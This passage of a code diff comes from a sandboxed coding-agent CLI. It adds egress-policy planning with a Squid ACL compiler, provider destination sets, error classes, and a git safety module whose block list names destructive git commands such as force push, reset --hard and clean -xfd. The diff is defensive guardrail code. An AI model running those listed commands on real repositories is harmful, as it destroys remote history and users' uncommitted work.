credential +keys) live in the adapter modules that use them. Usage: - from scc_cli.core.constants import AGENT_NAME, SANDBOX_IMAGE + from scc_cli.core.constants import CLI_VERSION, CURRENT_SCHEMA_VERSION """ from importlib.metadata import PackageNotFoundError from importlib.metadata import version as get_package_version -# ───────────────────────────────────────────────────────────────────────────── -# Agent Configuration -# ───────────────────────────────────────────────────────────────────────────── - -# The agent binary name inside the container -# This is passed to `docker sandbox run` and `docker exec` -AGENT_NAME = "claude" - -# The Docker sandbox template image -SANDBOX_IMAGE = "docker/sandbox-templates:claude-code" - -# ───────────────────────────────────────────────────────────────────────────── -# Credential & Storage Paths -# ───────────────────────────────────────────────────────────────────────────── - -# Directory name inside user home for agent config/credentials -# Maps to ~/.claude/ on host and /home/agent/.claude/ in container -AGENT_CONFIG_DIR = ".claude" - -# Docker volume for persistent sandbox data -SANDBOX_DATA_VOLUME = "docker-claude-sandbox-data" - -# Mount point inside the container for the data volume -SANDBOX_DATA_MOUNT = "/mnt/claude-data" - -# Safety net policy injection -# This is the filename for the extracted security.safety_net blob (NOT full org config) -SAFETY_NET_POLICY_FILENAME = "effective_policy.json" - -# Credential file paths (relative to agent home directory) -CREDENTIAL_PATHS = ( - f"/home/agent/{AGENT_CONFIG_DIR}/.credentials.json", - f"/home/agent/{AGENT_CONFIG_DIR}/credentials.json", -) - -# OAuth credential key in credentials file -OAUTH_CREDENTIAL_KEY = "claudeAiOauth" - # ───────────────────────────────────────────────────────────────────────────── # Git Integration # ───────────────────────────────────────────────────────────────────────────── @@ -61,13 +20,6 @@ # Uses product namespace (scc/) not agent namespace (claude/) WORKTREE_BRANCH_PREFIX = "scc/" -# ───────────────────────────────────────────────────────────────────────────── -# Default Plugin Marketplace -# ───────────────────────────────────────────────────────────────────────────── - -# Default GitHub repo for plugins marketplace -DEFAULT_MARKETPLACE_REPO = "sundsvall/claude-plugins-marketplace" - # ───────────────────────────────────────────────────────────────────────────── # Version Information # ───────────────────────────────────────────────────────────────────────────── diff --git a/src/scc_cli/core/contracts.py b/src/scc_cli/core/contracts.py new file mode 100644 index 0000000..6c678ba --- /dev/null +++ b/src/scc_cli/core/contracts.py @@ -0,0 +1,284 @@ +"""Typed core contracts for provider-neutral launch, runtime, network, safety, and audit planning. + +These models define the M001 contract surface without forcing the existing +launch/runtime flow to migrate all at once. They are intentionally thin, +provider-neutral, and suitable for later adoption by application services, +runtime backends, and provider adapters. +""" + +from __future__ import annotations + +from dataclasses import dataclass, field +from datetime import datetime, timezone +from pathlib import Path +from typing import Any + +from .enums import NetworkPolicy, SeverityLevel +from .governed_artifacts import ( # noqa: F401 — re-exports for downstream consumers + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) + + +@dataclass(frozen=True) +class DestinationSet: + """Named bundle of network destinations required or allowed for a launch plan. + + Attributes: + name: Stable identifier for the destination bundle. + destinations: Hostnames, domains, or named endpoints in the bundle. + required: Whether the launch cannot proceed without this bundle. + description: Short explanation of why the bundle exists. + """ + + name: str + destinations: tuple[str, ...] = () + required: bool = False + description: str = "" + + +@dataclass(frozen=True) +class EgressRule: + """One normalized network rule in a computed egress plan. + + Attributes: + target: Host, domain glob, CIDR, or named resource the rule applies to. + allow: Whether the rule allows or blocks the target. + reason: Short explanation for why the rule exists. + protocol: Optional transport scope, such as http or https. + """ + + target: str + allow: bool + reason: str + protocol: str | None = None + + +@dataclass(frozen=True) +class NetworkPolicyPlan: + """Typed result of control-plane network planning. + + Attributes: + mode: Truthful network policy mode for the launch. + destination_sets: Named destination bundles included in the plan. + egress_rules: Normalized ordered egress rules. + enforced_by_runtime: Whether the runtime is expected to enforce the plan. + notes: Additional operator-facing caveats or context. + """ + + mode: NetworkPolicy + destination_sets: tuple[DestinationSet, ...] = () + egress_rules: tuple[EgressRule, ...] = () + enforced_by_runtime: bool = False + notes: tuple[str, ...] = () + + +@dataclass(frozen=True) +class RuntimeInfo: + """Capabilities and identity of a resolved sandbox runtime backend. + + Attributes: + runtime_id: Stable backend identifier, such as docker or podman. + display_name: Human-readable runtime name. + cli_name: Executable name used for subprocess invocation. + supports_oci: Whether the backend supports OCI container workflows. + supports_internal_networks: Whether isolated/internal networking is supported. + supports_host_network: Whether host networking is available. + rootless: Whether the runtime is operating in rootless mode, if known. + """ + + runtime_id: str + display_name: str + cli_name: str + supports_oci: bool + supports_internal_networks: bool + supports_host_network: bool + rootless: bool | None = None + version: str | None = None + desktop_version: str | None = None + daemon_reachable: bool = False + sandbox_available: bool = False + preferred_backend: str | None = None + + +@dataclass(frozen=True) +class SafetyPolicy: + """Normalized safety policy available to runtime and adapter layers. + + Attributes: + action: Baseline action when a guarded command is matched. + rules: Boolean or scalar rule settings keyed by stable rule name. + source: Where the policy originated, such as org.security.safety_net. + """ + + action: str = "block" + rules: dict[str, Any] = field(default_factory=dict) + source: str = "org.security.safety_net" + + +@dataclass(frozen=True) +class SafetyVerdict: + """Decision produced by safety evaluation for one attempted action. + + Attributes: + allowed: Whether the action is permitted. + reason: User-facing reason for the decision. + matched_rule: Stable rule identifier, if any. + command_family: High-level command family, if known. + """ + + allowed: bool + reason: str + matched_rule: str | None = None + command_family: str | None = None + + +@dataclass(frozen=True) +class SafetyCheckResult: + """Result of a provider safety adapter check. + + Attributes: + verdict: The underlying engine verdict. + user_message: Provider-formatted message for the user. + audit_emitted: Whether an audit event was emitted. + """ + + verdict: SafetyVerdict + user_message: str + audit_emitted: bool + + +@dataclass(frozen=True) +class AuditEvent: + """Shared typed audit record for network, safety, and launch events. + + Attributes: + event_type: Stable event identifier. + message: Human-readable event summary. + severity: Audit severity level. + occurred_at: UTC timestamp of the event. + subject: Optional subject such as plugin, server, or provider. + metadata: Structured key-value context safe for serialization. + """ + + event_type: str + message: str + severity: SeverityLevel = SeverityLevel.INFO + occurred_at: datetime = field(default_factory=lambda: datetime.now(timezone.utc)) + subject: str | None = None + metadata: dict[str, str] = field(default_factory=dict) + + +@dataclass(frozen=True) +class ProviderRuntimeSpec: + """Frozen runtime constants for a known agent provider. + + Centralises image ref, config directory, settings path, and data + volume in one place so that scattered dicts can be replaced with a + single registry lookup. + + Attributes: + provider_id: Stable provider identifier (e.g. ``claude``, ``codex``). + display_name: Human-readable provider name. + image_ref: OCI image reference string for the provider container. + config_dir: Provider config directory name under ``/home/agent/``. + settings_path: Relative path to the provider settings file. + settings_scope: Where to root settings_path: ``"home"`` uses + ``/home/agent/`` (user-level config); ``"workspace"`` uses the + container workspace mount (project-scoped config, per D041). + data_volume: Docker named volume for credential/data persistence. + """ + + provider_id: str + display_name: str + image_ref: str + config_dir: str + settings_path: str + settings_scope: str = "home" + data_volume: str = "" + + +@dataclass(frozen=True) +class AuthReadiness: + """Auth credential readiness for a provider. + + Attributes: + status: Whether the auth credential is 'missing' or 'present'. + mechanism: How the provider authenticates (e.g. 'oauth_file', 'auth_json_file'). + guidance: Actionable next step for the user if auth is missing. + """ + + status: str # 'missing' or 'present' + mechanism: str # 'oauth_file' or 'auth_json_file' + guidance: str # actionable next step + + +@dataclass(frozen=True) +class ProviderCapabilityProfile: + """Provider-neutral description of adapter capabilities and requirements. + + Attributes: + provider_id: Stable provider identifier. + display_name: Human-readable provider name. + required_destination_set: Provider-core destination bundle required to launch. + supports_resume: Whether the provider can resume prior sessions. + supports_skills: Whether shared skills are supported. + supports_native_integrations: Whether provider-native hooks/plugins/rules exist. + """ + + provider_id: str + display_name: str + required_destination_set: str + supports_resume: bool = False + supports_skills: bool = False + supports_native_integrations: bool = False + + +@dataclass(frozen=True) +class AgentLaunchSpec: + """Provider-owned launch plan handed to the runtime layer. + + Attributes: + provider_id: Stable provider identifier. + argv: Provider launch command argv. + env: Provider launch environment. + workdir: Launch working directory. + artifact_paths: Provider-owned config or credential artifact paths. + required_destination_sets: Provider-core destination bundles required to launch. + ux_addons: Provider-native UX integrations or sidecar artifacts. + """ + + provider_id: str + argv: tuple[str, ...] + env: dict[str, str] = field(default_factory=dict) + workdir: Path | None = None + artifact_paths: tuple[Path, ...] = () + required_destination_sets: tuple[str, ...] = () + ux_addons: tuple[str, ...] = () + + +@dataclass(frozen=True) +class RenderArtifactsResult: + """Unified result of rendering artifacts through a provider adapter. + + Returned by ``AgentProvider.render_artifacts()``. Each adapter wraps its + own renderer-specific result into this provider-neutral type so the launch + pipeline can handle outcomes without importing adapter internals. + + Attributes: + rendered_paths: Files/directories written to the workspace. + skipped_artifacts: Artifact names that could not be rendered. + warnings: Non-fatal issues encountered during rendering. + settings_fragment: Dict fragment for the caller to merge into the + provider's settings surface (settings.local.json for Claude, + .mcp.json for Codex, etc.). Empty dict when nothing to merge. + """ + + rendered_paths: tuple[Path, ...] = () + skipped_artifacts: tuple[str, ...] = () + warnings: tuple[str, ...] = () + settings_fragment: dict[str, Any] = field(default_factory=dict) diff --git a/src/scc_cli/core/destination_registry.py b/src/scc_cli/core/destination_registry.py new file mode 100644 index 0000000..9831828 --- /dev/null +++ b/src/scc_cli/core/destination_registry.py @@ -0,0 +1,91 @@ +"""Provider destination registry — pure mapping from named set IDs to typed DestinationSet objects. + +This module defines the canonical set of provider-core destination bundles +and exposes helpers for resolving names to sets and converting sets to +egress allow-rules. No I/O, no side effects — suitable for use in +planning, validation, and diagnostics layers. +""" + +from __future__ import annotations + +from .contracts import DestinationSet, EgressRule + +# --------------------------------------------------------------------------- +# Canonical provider destination sets +# --------------------------------------------------------------------------- + +PROVIDER_DESTINATION_SETS: dict[str, DestinationSet] = { + "anthropic-core": DestinationSet( + name="anthropic-core", + destinations=("api.anthropic.com",), + required=True, + description="Anthropic API core access", + ), + "openai-core": DestinationSet( + name="openai-core", + destinations=("api.openai.com",), + required=True, + description="OpenAI API core access", + ), +} + + +# --------------------------------------------------------------------------- +# Resolution +# --------------------------------------------------------------------------- + + +def resolve_destination_sets( + names: tuple[str, ...], +) -> tuple[DestinationSet, ...]: + """Resolve an ordered sequence of destination set names to typed objects. + + Args: + names: Destination set identifiers to look up. + + Returns: + Ordered tuple of resolved ``DestinationSet`` objects. + + Raises: + ValueError: If any name is not present in the registry. + """ + resolved: list[DestinationSet] = [] + for name in names: + dest_set = PROVIDER_DESTINATION_SETS.get(name) + if dest_set is None: + known = ", ".join(sorted(PROVIDER_DESTINATION_SETS)) + raise ValueError(f"Unknown destination set {name!r}. Known sets: {known}") + resolved.append(dest_set) + return tuple(resolved) + + +# --------------------------------------------------------------------------- +# Rule generation +# --------------------------------------------------------------------------- + + +def destination_sets_to_allow_rules( + sets: tuple[DestinationSet, ...], +) -> tuple[EgressRule, ...]: + """Convert resolved destination sets into allow-type egress rules. + + Each host in each set becomes a separate ``EgressRule`` with + ``allow=True``. This keeps rule generation reusable across backends. + + Args: + sets: Resolved destination set objects. + + Returns: + Ordered tuple of ``EgressRule`` allow entries. + """ + rules: list[EgressRule] = [] + for dest_set in sets: + for host in dest_set.destinations: + rules.append( + EgressRule( + target=host, + allow=True, + reason=f"provider-core: {dest_set.name}", + ) + ) + return tuple(rules) diff --git a/src/scc_cli/core/egress_policy.py b/src/scc_cli/core/egress_policy.py new file mode 100644 index 0000000..e50a689 --- /dev/null +++ b/src/scc_cli/core/egress_policy.py @@ -0,0 +1,173 @@ +"""Egress plan builder and Squid ACL compiler. + +Pure-logic layer that converts network policy mode, destination sets, and +egress rules into a ``NetworkPolicyPlan``, then compiles that plan into a +Squid ACL configuration string. + +Security invariants: +- Deny rules always precede allow rules in compiled output. +- Default deny rules cover IP literals, loopback, private CIDRs, + link-local, and cloud metadata endpoints. +- Final ACL line is ``http_access deny all`` (enforced modes) + or ``http_access allow all`` (open mode). +""" + +from __future__ import annotations + +import re + +from .contracts import DestinationSet, EgressRule, NetworkPolicyPlan +from .enums import NetworkPolicy + +# --------------------------------------------------------------------------- +# Private constants — default deny targets +# --------------------------------------------------------------------------- + +_IP_LITERAL_PATTERN: re.Pattern[str] = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$") + +_PRIVATE_CIDRS: tuple[str, ...] = ( + "10.0.0.0/8", + "172.16.0.0/12", + "192.168.0.0/16", +) + +_LOOPBACK_CIDR: str = "127.0.0.0/8" + +_LINK_LOCAL_CIDR: str = "169.254.0.0/16" + +_METADATA_ENDPOINT: str = "169.254.169.254" + +_DEFAULT_DENY_TARGETS: tuple[tuple[str, str], ...] = ( + (_LOOPBACK_CIDR, "deny loopback"), + *((cidr, f"deny private CIDR {cidr}") for cidr in _PRIVATE_CIDRS), + (_LINK_LOCAL_CIDR, "deny link-local"), + (_METADATA_ENDPOINT, "deny cloud metadata endpoint"), +) +"""Each entry is ``(target, reason)`` for the default deny rule set.""" + + +# --------------------------------------------------------------------------- +# Public API +# --------------------------------------------------------------------------- + + +def build_egress_plan( + mode: NetworkPolicy, + destination_sets: tuple[DestinationSet, ...] = (), + egress_rules: tuple[EgressRule, ...] = (), +) -> NetworkPolicyPlan: + """Build a ``NetworkPolicyPlan`` from policy mode and optional inputs. + + Parameters + ---------- + mode: + The active network policy mode. + destination_sets: + Named destination bundles provided by the provider or config. + egress_rules: + Additional allow/deny rules supplied by the caller (appended + after the default deny set when mode is ``WEB_EGRESS_ENFORCED``). + + Returns + ------- + NetworkPolicyPlan + A frozen plan suitable for ACL compilation or runtime enforcement. + """ + if mode is NetworkPolicy.OPEN: + return NetworkPolicyPlan( + mode=mode, + destination_sets=destination_sets, + egress_rules=(), + enforced_by_runtime=False, + ) + + if mode is NetworkPolicy.LOCKED_DOWN_WEB: + return NetworkPolicyPlan( + mode=mode, + destination_sets=destination_sets, + egress_rules=(), + enforced_by_runtime=True, + notes=("Agent container uses --network=none; no egress possible.",), + ) + + # WEB_EGRESS_ENFORCED — assemble default deny rules, then caller rules. + deny_rules = tuple( + EgressRule(target=target, allow=False, reason=reason) + for target, reason in _DEFAULT_DENY_TARGETS + ) + + return NetworkPolicyPlan( + mode=mode, + destination_sets=destination_sets, + egress_rules=deny_rules + egress_rules, + enforced_by_runtime=True, + ) + + +def compile_squid_acl(plan: NetworkPolicyPlan) -> str: + """Compile a ``NetworkPolicyPlan`` into a Squid ACL configuration string. + + Squid evaluates rules top-to-bottom, first-match wins. This compiler + emits deny rules first, then allow rules, and always closes with a + terminal ``http_access`` directive. + + Parameters + ---------- + plan: + The network policy plan to compile. + + Returns + ------- + str + Multi-line Squid ACL configuration fragment. + """ + if plan.mode is NetworkPolicy.OPEN: + return "http_access allow all\n" + + if plan.mode is NetworkPolicy.LOCKED_DOWN_WEB: + return "http_access deny all\n" + + # WEB_EGRESS_ENFORCED — build ACL definitions and access lines. + acl_defs: list[str] = [] + deny_access: list[str] = [] + allow_access: list[str] = [] + + deny_counter = 0 + allow_counter = 0 + + for rule in plan.egress_rules: + if not rule.allow: + deny_counter += 1 + acl_name = f"deny_{deny_counter}" + acl_defs.append(_acl_definition(acl_name, rule.target)) + deny_access.append(f"http_access deny {acl_name}") + else: + allow_counter += 1 + acl_name = f"allow_{allow_counter}" + acl_defs.append(_acl_definition(acl_name, rule.target)) + allow_access.append(f"http_access allow {acl_name}") + + lines = acl_defs + [""] + deny_access + allow_access + ["http_access deny all", ""] + return "\n".join(lines) + + +# --------------------------------------------------------------------------- +# Private helpers +# --------------------------------------------------------------------------- + + +def _is_cidr(target: str) -> bool: + """Return True if *target* looks like a CIDR notation (contains ``/``).""" + return "/" in target + + +def _is_ip_literal(target: str) -> bool: + """Return True if *target* is a bare IPv4 address.""" + return bool(_IP_LITERAL_PATTERN.match(target)) + + +def _acl_definition(acl_name: str, target: str) -> str: + """Return a Squid ``acl`` definition line for the given target.""" + if _is_cidr(target) or _is_ip_literal(target): + return f"acl {acl_name} dst {target}" + return f"acl {acl_name} dstdomain {target}" diff --git a/src/scc_cli/core/enums.py b/src/scc_cli/core/enums.py index 4dcab8a..bfa0ff2 100644 --- a/src/scc_cli/core/enums.py +++ b/src/scc_cli/core/enums.py @@ -92,11 +92,17 @@ class MarketplaceSourceType(str, Enum): class NetworkPolicy(str, Enum): - """Network policy options.""" + """Network policy options. - CORP_PROXY_ONLY = "corp-proxy-only" - UNRESTRICTED = "unrestricted" - ISOLATED = "isolated" + Truthful vocabulary introduced in M001 — names reflect observable behavior: + - OPEN: no egress enforcement; agent has unrestricted network access. + - WEB_EGRESS_ENFORCED: egress is gated through a proxy with an ACL. + - LOCKED_DOWN_WEB: no external network access at all. + """ + + OPEN = "open" + WEB_EGRESS_ENFORCED = "web-egress-enforced" + LOCKED_DOWN_WEB = "locked-down-web" class DecisionResult(str, Enum): @@ -105,3 +111,10 @@ class DecisionResult(str, Enum): ALLOWED = "allowed" BLOCKED = "blocked" DENIED = "denied" + + +class CommandFamily(str, Enum): + """High-level command family for safety classification.""" + + DESTRUCTIVE_GIT = "destructive-git" + NETWORK_TOOL = "network-tool" diff --git a/src/scc_cli/core/errors.py b/src/scc_cli/core/errors.py index 44c8b7a..5f65152 100644 --- a/src/scc_cli/core/errors.py +++ b/src/scc_cli/core/errors.py @@ -1,5 +1,5 @@ """ -Typed exceptions for SCC - Sandboxed Claude CLI. +Typed exceptions for SCC - Sandboxed Coding CLI. Error handling philosophy: "One message, one action" - Each error has a clear user_message (what went wrong) @@ -245,6 +245,34 @@ def __post_init__(self) -> None: self.user_message = f"Container not found: {self.container_name}" +@dataclass +class ExistingSandboxConflictError(ToolError): + """A live sandbox already exists for this workspace/provider.""" + + container_name: str = "" + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + super().__post_init__() + if not self.user_message: + if self.container_name: + self.user_message = ( + f"An SCC sandbox is already running for this workspace: {self.container_name}" + ) + else: + self.user_message = "An SCC sandbox is already running for this workspace" + if not self.suggested_action: + if self.container_name: + self.suggested_action = ( + "Use 'scc start --fresh' to replace it, " + f"'scc stop {shlex.quote(self.container_name)}' to stop it, " + "or remove it manually first." + ) + else: + self.suggested_action = "Use 'scc start --fresh' to replace it, or stop/remove the existing container first" + + @dataclass class InternalError(SCCError): """Internal error (bug in the CLI).""" @@ -314,3 +342,314 @@ def __post_init__(self) -> None: f'{flag} {quoted_item} --ttl 8h --reason "..."' ) self.suggested_action = f"To request a policy exception (requires PR approval): {cmd}" + + +@dataclass +class ProviderNotAllowedError(PolicyViolationError): + """Resolved provider is not in the team's allowed_providers list.""" + + provider_id: str = "" + allowed_providers: tuple[str, ...] = () + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + if not self.user_message and self.provider_id: + allowed = ", ".join(self.allowed_providers) if self.allowed_providers else "none" + self.user_message = ( + f"Provider '{self.provider_id}' is not allowed by team policy. " + f"Allowed providers: [{allowed}]" + ) + if not self.suggested_action: + self.suggested_action = ( + "Use one of the allowed providers, or ask your team admin " + "to update the allowed_providers list." + ) + + +@dataclass +class InvalidProviderError(SCCError): + """Provider ID is not recognised by the runtime registry.""" + + provider_id: str = "" + known_providers: tuple[str, ...] = () + exit_code: int = field(default=2, init=False) + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + if not self.user_message: + self.user_message = ( + f"Unknown provider '{self.provider_id}'. " + f"Known providers: {', '.join(self.known_providers)}" + ) + if not self.suggested_action: + self.suggested_action = f"Use one of: {', '.join(self.known_providers)}" + + +@dataclass +class ProviderNotReadyError(PrerequisiteError): + """Provider is not ready for use (general readiness failure).""" + + provider_id: str = "" + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + if not self.user_message: + self.user_message = ( + f"Provider '{self.provider_id}' is not ready. " + "Required prerequisites are missing or misconfigured." + ) + if not self.suggested_action: + self.suggested_action = ( + f"Run 'scc doctor --provider {self.provider_id}' to diagnose, " + "then follow the suggested fixes." + ) + + +@dataclass +class ProviderImageMissingError(PrerequisiteError): + """Provider container image is not available locally.""" + + provider_id: str = "" + image_ref: str = "" + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + if not self.user_message: + image_detail = f" ({self.image_ref})" if self.image_ref else "" + self.user_message = ( + f"Container image for provider '{self.provider_id}' " + f"is not available locally{image_detail}." + ) + if not self.suggested_action: + if self.provider_id: + self.suggested_action = ( + f"Build the image with: docker build -t " + f"images/scc-agent-{self.provider_id}/" + ) + else: + self.suggested_action = "Build the provider image and try again." + + +@dataclass +class ProviderImageBuildError(ToolError): + """Provider container image build failed.""" + + provider_id: str = "" + image_ref: str = "" + build_command: str = "" + user_message: str = field(default="") + suggested_action: str = field(default="") + + def __post_init__(self) -> None: + super().__post_init__() + if not self.user_message: + image_detail = f" ({self.image_ref})" if self.image_ref else "" + self.user_message = ( + f"Failed to build the container image for provider '{self.provider_id}'" + f"{image_detail}." + ) + if not self.suggested_action: + if self.build_command: + self.suggested_action = ( + f"Review the Docker build output and retry:\n {self.build_command}" + ) + else: + self.suggested_action = "Review the Docker build output and try again." + + +@dataclass +class LaunchPreflightError(ConfigError): + """Launch was blocked before runtime startup.""" + + provider_id: str = "" + network_policy: str = "" + required_destination_sets: tuple[str, ...] = field(default_factory=tuple) + + +@dataclass +class InvalidLaunchPlanError(LaunchPreflightError): + """Prepared launch metadata is missing or malformed.""" + + reason: str = "Launch plan is invalid." + user_message: str = field(default="") + suggested_action: str = field( + default="Repair the provider launch wiring and try the command again." + ) + + def __post_init__(self) -> None: + if not self.user_message: + self.user_message = self.reason + + +@dataclass +class LaunchPolicyBlockedError(LaunchPreflightError): + """Launch cannot proceed under the current network policy.""" + + user_message: str = field(default="") + suggested_action: str = field( + default=( + "Choose a less restrictive network policy or use a provider whose " + "required destination sets are allowed." + ) + ) + + def __post_init__(self) -> None: + if not self.user_message: + required = ", ".join(self.required_destination_sets) or "none" + provider = self.provider_id or "unknown" + policy = self.network_policy or "unknown" + self.user_message = ( + f"Launch blocked before startup: provider '{provider}' requires " + f"destination sets [{required}] but the current network policy is '{policy}'." + ) + + +@dataclass +class LaunchAuditWriteError(ConfigError): + """Launch audit event could not be persisted.""" + + audit_destination: str = "" + event_type: str = "" + reason: str = "" + user_message: str = field(default="") + suggested_action: str = field( + default="Check that SCC's local audit path exists and is writable, then retry." + ) + + def __post_init__(self) -> None: + if not self.user_message: + destination = self.audit_destination or "the configured audit sink" + self.user_message = f"Failed to write launch audit event to {destination}." + if not self.debug_context: + details = [] + if self.event_type: + details.append(f"event_type={self.event_type}") + if self.reason: + details.append(f"error={self.reason}") + if details: + self.debug_context = "\n".join(details) + + +@dataclass +class LaunchAuditUnavailableError(ConfigError): + """Launch auditing is required but the sink is not wired.""" + + user_message: str = field(default="Launch audit sink is not configured.") + suggested_action: str = field( + default="Use the SCC-wired launch dependency builder so preflight can audit before startup." + ) + + +# --------------------------------------------------------------------------- +# Renderer / artifact pipeline errors (fail-closed) +# --------------------------------------------------------------------------- + + +@dataclass +class RendererError(SCCError): + """Base error for artifact rendering pipeline failures. + + All renderer errors are fail-closed — if an artifact cannot be safely + rendered, the pipeline blocks rather than silently skipping. Error + payloads are structured for support bundles and ``scc doctor`` checks. + """ + + bundle_id: str = "" + artifact_name: str = "" + exit_code: int = field(default=4, init=False) + + +@dataclass +class BundleResolutionError(RendererError): + """A bundle referenced by the team config could not be resolved. + + Raised for missing bundle IDs or invalid artifact references that + cannot be silently skipped under fail-closed policy. + """ + + available_bundles: tuple[str, ...] = () + user_message: str = field(default="") + suggested_action: str = field( + default="Check the team's enabled_bundles list against the governed_artifacts catalog." + ) + + def __post_init__(self) -> None: + if not self.user_message: + available = ", ".join(self.available_bundles) if self.available_bundles else "none" + self.user_message = ( + f"Bundle '{self.bundle_id}' not found in the governed artifacts catalog. " + f"Available bundles: [{available}]" + ) + + +@dataclass +class InvalidArtifactReferenceError(RendererError): + """An artifact reference inside a bundle is invalid or malformed. + + Fail-closed: the entire bundle is blocked if any artifact reference + cannot be validated. + """ + + reason: str = "" + user_message: str = field(default="") + suggested_action: str = field( + default="Fix the artifact reference in the governed_artifacts catalog and retry." + ) + + def __post_init__(self) -> None: + if not self.user_message: + self.user_message = ( + f"Invalid artifact reference '{self.artifact_name}' " + f"in bundle '{self.bundle_id}': {self.reason}" + ) + + +@dataclass +class MaterializationError(RendererError): + """Artifact content could not be materialized to disk. + + Covers file-write failures, directory creation errors, and + serialization problems during rendering. + """ + + target_path: str = "" + reason: str = "" + user_message: str = field(default="") + suggested_action: str = field( + default="Check filesystem permissions and disk space, then retry." + ) + + def __post_init__(self) -> None: + if not self.user_message: + where = f" at '{self.target_path}'" if self.target_path else "" + self.user_message = ( + f"Failed to materialize artifact '{self.artifact_name}'" + f"{where} for bundle '{self.bundle_id}': {self.reason}" + ) + + +@dataclass +class MergeConflictError(RendererError): + """A merge conflict was detected on a single-file surface. + + Covers hooks.json merge conflicts, .mcp.json merge conflicts, + and settings.local.json merge conflicts. + """ + + target_path: str = "" + conflict_detail: str = "" + user_message: str = field(default="") + suggested_action: str = field( + default="Resolve the conflict manually or remove the conflicting file and retry." + ) + + def __post_init__(self) -> None: + if not self.user_message: + where = f" in '{self.target_path}'" if self.target_path else "" + self.user_message = ( + f"Merge conflict{where} for bundle '{self.bundle_id}': {self.conflict_detail}" + ) diff --git a/src/scc_cli/core/git_safety_rules.py b/src/scc_cli/core/git_safety_rules.py new file mode 100644 index 0000000..fb67e2c --- /dev/null +++ b/src/scc_cli/core/git_safety_rules.py @@ -0,0 +1,527 @@ +"""Git command analysis for detecting destructive operations. + +This module analyzes git commands and returns typed SafetyVerdict objects +for destructive operations that could damage remote history or local work. + +Lifted from the scc-safety-net plugin into core. All analyze_* functions +return SafetyVerdict | None instead of raw strings. + +Blocked operations (v0.2.0): +- git push --force / -f / +refspec +- git push --mirror +- git reset --hard +- git branch -D +- git stash drop / clear +- git clean -f / -fd / -xfd +- git checkout -- +- git restore (worktree, not --staged) +- git reflog expire --expire-unreachable=now +- git gc --prune=now +- git filter-branch (always blocked) +""" + +from __future__ import annotations + +from collections.abc import Callable +from pathlib import Path + +from scc_cli.core.contracts import SafetyVerdict +from scc_cli.core.enums import CommandFamily + +# ───────────────────────────────────────────────────────────────────────────── +# Git Global Option Handling +# ───────────────────────────────────────────────────────────────────────────── + +# Git global options that take a value (skip both flag and value) +GIT_GLOBAL_OPTIONS_WITH_VALUE = frozenset({"-C", "-c", "--git-dir", "--work-tree"}) + +# Git global options that combine flag=value +GIT_GLOBAL_OPTIONS_COMBINED = ("--git-dir=", "--work-tree=") + + +def normalize_git_tokens(tokens: list[str]) -> tuple[str, list[str]]: + """Extract subcommand and args, skipping global git options. + + Handles: + - /usr/bin/git → git + - git -C /path push → push + - git --git-dir=.git push → push + + Args: + tokens: Full command tokens starting with git + + Returns: + Tuple of (subcommand, remaining_args) + """ + if not tokens: + return "", [] + + # Check if first token is git (handle /usr/bin/git) + if Path(tokens[0]).name != "git": + return "", [] + + i = 1 + while i < len(tokens): + token = tokens[i] + + # Handle -C, -c, --git-dir, --work-tree (with separate value) + if token in GIT_GLOBAL_OPTIONS_WITH_VALUE: + i += 2 # Skip option and its value + # Handle --git-dir=.git, --work-tree=/path + elif any(token.startswith(prefix) for prefix in GIT_GLOBAL_OPTIONS_COMBINED): + i += 1 # Skip combined option=value + else: + break + + if i >= len(tokens): + return "", [] + + return tokens[i], tokens[i + 1 :] + + +# ───────────────────────────────────────────────────────────────────────────── +# Force Push Detection +# ───────────────────────────────────────────────────────────────────────────── + + +def has_force_flag(args: list[str]) -> bool: + """Detect force flags including combined short options. + + Matches: -f, --force, -xfd (contains -f) + + IMPORTANT: Only apply this function for git subcommands where -f + means "force" (push, clean, branch -D). Do NOT apply globally - + some subcommands use -f for different meanings. + + Args: + args: Command arguments (after subcommand) + + Returns: + True if force flag detected + """ + for token in args: + if token == "-f" or token == "--force": + return True + # Combined short flags: -xfd contains -f + # Must start with - but not -- (long options) + if token.startswith("-") and not token.startswith("--") and "f" in token: + return True + return False + + +def has_force_refspec(args: list[str]) -> bool: + """Detect force push via +refspec patterns. + + Matches: +main, +main:main, HEAD:+main, origin/+main + + Args: + args: Command arguments (after subcommand) + + Returns: + True if +refspec force push pattern detected + """ + for token in args: + # Skip flags + if token.startswith("-"): + continue + # +ref at start of token + if token.startswith("+") and not token.startswith("++"): + return True + # ref:+ref pattern (e.g., HEAD:+main) + if ":+" in token: + return True + return False + + +def has_force_with_lease(args: list[str]) -> bool: + """Check if --force-with-lease is present (safe force push). + + Args: + args: Command arguments + + Returns: + True if --force-with-lease is present + """ + return any(arg.startswith("--force-with-lease") for arg in args) + + +# ───────────────────────────────────────────────────────────────────────────── +# Destructive Command Detection +# ───────────────────────────────────────────────────────────────────────────── + +# Block reasons with safe alternatives +BLOCK_MESSAGES: dict[str, str] = { + "force_push": ( + "BLOCKED: Force push destroys remote history.\n\n" + "Safe alternative: git push --force-with-lease" + ), + "push_mirror": ( + "BLOCKED: git push --mirror overwrites entire remote.\n\n" + "Safe alternative: git push (regular push)" + ), + "reflog_expire": ( + "BLOCKED: reflog expire --expire-unreachable=now destroys recovery history.\n\n" + "Safe alternative: Don't manually expire reflog; let Git handle it" + ), + "gc_prune": ( + "BLOCKED: git gc --prune=now immediately deletes objects.\n\n" + "Safe alternative: git gc (default prune with grace period)" + ), + "filter_branch": ( + "BLOCKED: git filter-branch rewrites history destructively.\n\n" + "Safe alternative: git filter-repo (external tool with safety checks)" + ), + "reset_hard": ( + "BLOCKED: git reset --hard destroys uncommitted changes.\n\n" + "Safe alternative: git stash (preserves changes)" + ), + "branch_force_delete": ( + "BLOCKED: git branch -D force-deletes without merge check.\n\n" + "Safe alternative: git branch -d (requires merge check)" + ), + "stash_drop": ( + "BLOCKED: git stash drop permanently deletes stash entry.\n\n" + "Safe alternative: Review with git stash list first" + ), + "stash_clear": ( + "BLOCKED: git stash 